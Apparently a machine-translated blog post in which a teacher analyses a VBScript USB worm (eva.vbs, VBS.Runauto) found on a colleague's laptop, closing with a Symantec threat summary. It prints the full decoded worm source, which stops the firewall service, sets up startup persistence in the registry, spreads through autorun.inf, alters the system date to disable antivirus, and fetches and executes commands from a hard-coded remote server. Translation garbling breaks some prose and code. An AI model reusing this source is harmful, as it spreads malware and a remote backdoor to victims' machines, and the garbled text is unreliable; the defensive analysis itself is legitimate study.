Recently, a colleague's notebook suffered from this virus. This semester, when I gave VBscript to computer students, I analyzed it by the way.
First, the virus samples are extracted from the computer infected with the virus. The virus samples are temporarily discovered and are not specially prepared, and are compressed and saved using winrar.
Open the compressed file of the virus sample on the lab machine. My Symantec 11 immediately reported an alarm and deleted the virus. Therefore, anti-virus software must be disabled or an "exception area" must be set for virus analysis. Therefore, the "evA" folder is created on the desktop and set it as the anti-virus exception folder, the virus sample is lying quietly inside.
Script virus is an interpreted program, so we don't need any special decompilation tool to view the source code. Although Windows notepad is enough, I still like to use UltraEdit.
Use UltraEdit to open Virus File 1. Note that to prevent false virus triggering, first change the vbs extension to txt.
Figure 1 virus script
When you open the virus script, you can find that the code is very readable, with uppercase and lowercase letters in disorder, and there are many symbols that you cannot understand. In fact, this is the "umbrella" that the virus wants to save itself ".
If the virus code is case sensitive, you can select text in UE (UltraEdit for short) and then convert it to lowercase letters using Ctrl + F5. For Password-like "00c2% 0033% ......" Is relatively troublesome.
From the virus code, we can find that "STrREVeRSE" and "unEscaPE" functions are called whenever there is a "garbled Code". Among them, "unescape" is a vbscript standard function, the function is to decode the strings encoded by the escape function. Here, we need to explain that Html in the Web is reserved for some symbols, such as the "<" and ">" symbols, if you need to display these symbols, You need to encode them in html. All spaces, punctuation marks, accents, and other non-ASCII characters are replaced by % xx encoding, xx indicates the hexadecimal number of the character. For example, "% 20" is returned by a space ". If the character value is greater than 255 characters, for example, Chinese characters, stored in % uxxxx format. After analyzing the "password", we found that the escape-encoded symbol string is reversed. Combined with the "STrREVeRSE" function name, we can conclude that the virus Author can prevent the virus from detecting antivirus software, uses encoding and reverse storage of key code.
In UE, strings can be directly encoded and decoded. However, there is no ready-made tool for string mirroring. Recently, JavaScript is being sent to students, the code for decoding or encoding a page is as follows:Copy codeThe Code is as follows: <! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> Reverse the string </title>
<Script type = "text/javascript">
Function _ reverse ()
{
With (document ){
If (rev. order. checked ){
Revedstr = rev. instr. value. split (''). reverse (). join ('')
Write ("<strong> reversed string: </strong>", revedstr, "<br> ");
Write ("<strong> unescape string: </strong>", unescape (revedstr), "<br> ");
Write ("<strong> escape string: </strong>", escape (revedstr), "<br> ");
}
Else {
Unescapstr = unescape (rev. instr. value );
Revedstr = unescapstr. split (''). reverse (). join ('');
Write ("<strong> uneacape string: </strong>", unescapstr, "<br/> ");
Write ("<strong> reversed string: </strong>", revedstr );
}
}
}
</Script>
</Head>
<Body>
<Form action = "" method = "post" name = "rev">
<Input name = "order" type = "checkbox" value = ""/> conversion order (reverse decoding first )? <Br/>
<Input name = "instr" type = "text" value = "enter" onmousemove = "this. select ()"/>
<Input name = "" type = "button" value = "convert" onclick = "_ reverse ()"/> </form>
</Body>
</Html>
The code after decoding the code using the above tool is as follows:Copy codeThe Code is as follows: On Error Resume Next
Set fso = CreateObject ("scripting. filesystemobject ")
Set wshshell = CreateObject (strreverse ("wscript. shell "))
Dim dri_list, dri_list0
Dim issend
Issend = 0
C_time = Date ()
'This is to disable SharedAccess (Intemet Connection Sharing and Firewall Service ).
Wshshell. run "net stop sharedaccess", 0
Set drvs = fso. drives
Sysdir = fso. GetSpecialFolder (1) 'windowsfolder = 0, SystemFolder = 1, TemporaryFolder = 2
Thispath = wscript. ScriptFullName
Set fc = fso. OpenTextFile (thispath, 1) 'forreading = 1, ForWriting = 2, ForAppending = 8
Scopy = fc. readall
Fc. Close
Set fc = Nothing
'Write the Registry registration file sysinfo. reg. The registration system automatically runs the virus upon startup.
Call writefile (sysdir & "\ sysinfo. reg ", "windows registry editor version 5.00 [hkey_local_machine \ software \ policies \ microsoft \ windows \ system \ scripts \ startup \ 0 \ 0]" script "=" % windir % \ system32 \\ prncfg. vbs "" parameters "=" "exectime" = hex (B):, 00, 00,00 [hkey_local_machine \ software \ microsoft \ windows \ currentversion \ group policy \ state \ machine \ scripts \ startup \ 0 \ 0] "script" = "% windir % \ system32 \\ prncfg. vbs "" parameters "=" "exectime" = hex (B):, 00
")
'Import the Registry sysinfo. reg
Wshshell. run "regedit/s sysinfo. reg", 0
Wscript. sleep 200
Fso. deletefile sysdir & "\ sysinfo. reg", True
'If the script currently running is in the system directory
If InStr (thispath, sysdir)> 0 Then
Dri_list0 = listdrv ()
O_time = left (c_time, 3) & cstr (Int (Mid (c_time, 4, 1)-1) & Right (c_time, Len (c_time)-4) 'callback time 1 year
Wshshell. run "cmd/c Date" & o_time, 0
Wscript. sleep 10000
For dri_ I = 1 to Len (dri_list0)
Call writeauto (Mid (dri_list0, dri_ I, 1 )&":\")
Next
Wshshell. run "cmd/c Date" & c_time, 0
'Wmi application query computer name, user name
Computername = "": username = ""
Set ob1_miservice = GetObject ("winmgmts: {impersonationlevel = impersonate }! \. \ Root \ cimv2 ")
Set colcomputers = obw.miservice.exe cquery ("select * from win32_computersystem ")
For Each objcomputer in colcomputers
Computername = objcomputer. name
Username = objcomputer. username
Next
If username = "" Then username = "evar"
If InStr (username, "\") <= 0 Then
Username = computername & "\" & username
End If
Do
If issend = 0 Then
'Link to the Internet to get the code to be executed
Set xml = CreateObject ("msxml2.serverxmlhttp ")
Xml. open "get", "http: // 202.119.104.100/zzb/eva/count. asp? A = "& username, 0
'Http: // 202.119.104.100/zzb/
Xml. setrequestheader "user-agent", "evar"
Xml. send ()
If Err. number = 0 Then
Issend = 1
Res = xml. responsetext
If ucase (left (res, 7) = ucase ("Execute") Then Execute res
Else
Err. clear
End If
Set xml = Nothing
End If
Dri_list = listdrv ()
For dri_k = 1 to Len (dri_list)
If InStr (dri_list0, Mid (dri_list, dri_k, 1) <= 0 Then
Call writeauto (Mid (dri_list, dri_k, 1 )&":\")
End If
Next
Dri_list0 = dri_list
Wscript. sleep 1000
Loop
Else
Wshshell. run "explorer. \", 3
Wscript. sleep 2000
Wshshell. appactivate LCase ("My Computer ")
Wshshell. sendkeys UCase ("% c") 'simulate the press Key alt + space + c, which is actually to close the window
Runflag = 0
'Obtain the current system process, WMI Application
For each ps in GetObject _
("Winmgmts: \. \ root \ cimv2: win32_process"). instances _
If lcase (ps. name) = lcase ("wscript.exe") Then
Runflag = runflag + 1
End If
Next
If runflag> = 2 Then wscript. quit
Set sf = fso. GetFolder (sysdir)
F_time = Left (sf. datecreated, InStr (sf. datecreated, "")-1)
Wshshell. run "cmd/c Date" & f_time, 0
Wscript. sleep 100
Call writefile (sysdir & lcase ("\ prncfg. vbs"), vs (scopy ))
Wshshell. run "cmd/c Date" & c_time, 0
Wshshell. run sysdir & "\ prncfg. vbs"
End If
'Confusing string for code variations!
Function vs (str)
Execute "For I = 1 to Len (str) c = ucase (Mid (str, I, 1) randomize If Int (rnd () * 100)> 50 Then vs = vs & lcase (c) Else vs = vs & c End If Next vs = replace (vs, ucase ("% u "), lcase ("% u "))"
End Function
'List drives
Function listdrv ()
Execute "Dim tmp_list =" "For each drv in drvs If drv. isready Then tmp_list = tmp_list & drv. driveletter End If Next listdrv = tmp_list"
End Function
'Write the autorun. inf file
Sub writeauto (path)
'Preparations before writing the Auto file. If the path contains the autorun. inf folder, rename it. If the path contains the autorun. inf file, delete it.
Execute "If fso. folderexists (path & "autorun. inf ") Then fso. movefolder path & "autorun. inf ", path & rnd () elseif fso. fileexists (path & "autorun. inf ") Then fso. deletefile path & "autorun. inf ", true End If"
'Launch code in autorun. inf
Repeated STR = "shell \ * \ commandpolicwscript.exe" & chr (34) & "eva. vbs" & chr (34)
Autostr = "[autorun]" & vbcrlf & "open =" & vbcrlf & replace (reverse STR, "*", "open") & vbcrlf & replace (reverse STR ,"*", "Lead e") & vbcrlf & replace (reverse STR, "*", "find ")
'Write
Call writefile (path & ucase ("autorun. inf"), autostr)
Call writefile (path & "eva. vbs", vs (scopy ))
End Sub
'Write content to fpath and set the file attributes to ReadOnly, Hidden, and System.
Sub writefile (fpath, content)
Execute "If fso. fileexists (fpath) Then fso. deletefile fpath, true Set fc = fso. openTextFile (fpath, 2, true) fc. write content fc. close Set fc = Nothing Set fa = fso. getfile (fpath) fa. attributes = 7 Set fa = Nothing"
End Sub
The above code has added a lot of comments. If you can see this, you should probably understand it. The encoding quality of the Code itself is normal, because the code downloads virus commands from a website of Nanjing Normal University, so it is estimated that it is a student.
In this virus, the author used a custom vs function to perform "face changing" to avoid anti-virus detection and use a random method to convert the case of the virus body, but in fact, this kind of processing has no effect on the real anti-virus software J.
In this virus, technologies such as registry, Windows automatic running, file operations, and WMI control are all mainstream technologies in the current Windows environment. It can be found that Microsoft provides call interfaces for scripts, especially VBScrit. Technically, the COM component provides Automation interfaces and supports the call of various scripts, it was originally intended to make Windows scripts do more things, but they are also "good" for virus services. Therefore, the main purpose of Virus analysis here is not to write viruses, instead, we learn programming technologies and use these technologies to facilitate our work and learning. Therefore, if you want to learn Script Programming, you can analyze this example.
As mentioned above, the virus is not detailed. Although I always think the code is the best explanation, I can't be sorry for the word "analysis" on the title.
In fact, this virus is mainly used to run the Windows Autorun. inf file. As a virus, you must run it directly or indirectly. When "ignorant users" double-click a USB flash drive with a virus, Autorun. the eva. the vbs virus is started. First, you can disable the "SharedAccess" service to disable the firewall that comes with Windows. This is mainly used to prepare the virus to communicate with external websites.
After the firewall is disabled, the script is written to a registry file and imported to the system in the code to enable the startup of the virus. This is also a common feature of the virus. After the program is started, it is difficult to determine whether the current process has been infected, windows WMI provides a large number of interfaces for the script to access the system function. Here, it is used to detect whether there are multiple virus processes in the system. If so, it will automatically exit. In fact, the main function of this virus is replication, which is also defined as the cause of the worm virus, but one of the important feature values makes me very interesting, this virus program will execute the virus Command sent from the slave server.
In this virus, the ServerXMLHTTP component is used to communicate with the slave server. This technology is actually the basis of our popular AJAX technology. Communication with the server and executing the virus code downloaded from the server reflects the hope that the virus Author can control "bots" for a long time, but what I cannot understand is, the code segment in the virus detects the account of the current computer user and sends the user information to the server. Among the many Chinese operating systems, most of them are in the dashboard. During this time, most of the popular Windows such as "tomato garden" were revised. Such Windows have a common point, that is, the installed system uses their "brand" as the user name. For example, in Windows of "tomato garden", the default user is "tomato garden ". From the perspective of this virus code, is it necessary to conduct a "dashboard Population Survey" for the Windwos version?
The last thing to mention is the modification of the system time by the virus. It is often fatal to attack anti-virus software by modifying the system time. It is ironic that the virus only switches the time forward for one year, so that the authorization time of many anti-virus software becomes invalid, this is like setting the wrong time when Windows XP was just released may cause system crash. Wrong time often destroys a seemingly solid system. In this way, the authorization time of Kaspersky becomes invalid, followed by the suspension of the Anti-Virus engine, so that the student virus without technical difficulty can become popular. Isn't that an irony of anti-virus vendors? In order to protect your own interests (using time authorization), users may be at risk of virus attacks. In fact, some anti-virus vendors have noticed this problem. If the authorization expires, they should not close the scanning and removal engine. They can close the update of the virus repository at most. In addition, the most effective modification time for this virus is to adjust the time forward rather than backward, because you do not know whether the authorization time for anti-virus software of different users is one year or n years, but you can be certain, the method of adjusting the time forward for one year may be normal for people with the same authorization, but it is hard for computers to understand.
The above is a simple analysis of the virus. I mainly talked about some of the parts that I am interested in. Next, let's talk about virus protection. At the front-end time, I attended a product conference in Symantec Nanjing, where a sales team was introducing their products, "No one will let their computers run naked now !!! ". I believe many of my friends know that streaking is a computer that does not install computer antivirus software. In fact, this sales is wrong. I have been "streaking" for more than a year, and the system has never encountered any problems, not by myself, I installed a certain brand of anti-virus software for scanning and found no virus. The reason why I installed it later is to test anti-virus software of a certain brand, and I was lazy to delete it later.
So many friends will say that you are really a "god man ". What I want to answer is actually not "God". You can do it either. The key is that you will not do it!
From the whole process of running the virus, we can find that basically the key operations can be successful only at the system administrator level. For example, modify the time, enumerate system processes, and read and write the registry. If your computer account is only a normal User, I think this virus will be lost to you.
In addition, because I like to analyze the behavior of viruses, this also found some tips for me to "escape" the virus. I analyzed the "Happy Time" script virus many years ago. At that time, I was not very familiar with the vbs script. It can be said that the virus gave me a better understanding of the vbs script capabilities, it inspired me to use scripts to solve problems in my work!
Appendix: Symantec's information on the virus
Discovered: March 12,200 7
Updated: March 12,200 7 5:17:48
Type: Worm
Infection Length: 1,112 bytes
Systems Affected: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows 2000
VBS. Runauto is a Visual Basic script worm that copies itself in the root folder of all drives (including removable devices) cannot floppy drives.
ProtectionInitial Rapid Release version March 13,200 7
Latest Rapid Release version September 17,200 8 revision 038
Initial Daily Certified version March 13,200 7
Latest Daily Certified version September 17,200 8 revision 039
Initial Weekly Certified release date March 14,200 7
Click here for a more detailed description of Rapid Release and Daily Certified virus definitions.
Threat AssessmentWildWild Level: Low
Number of Infections: 0-49
Number of Sites: 0-2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
DamageDamage Level: Low
Payload: Copies itself to all drives on the compromised computer.
DistributionDistribution Level: Low
Writeup By: Mircea Ciubotariu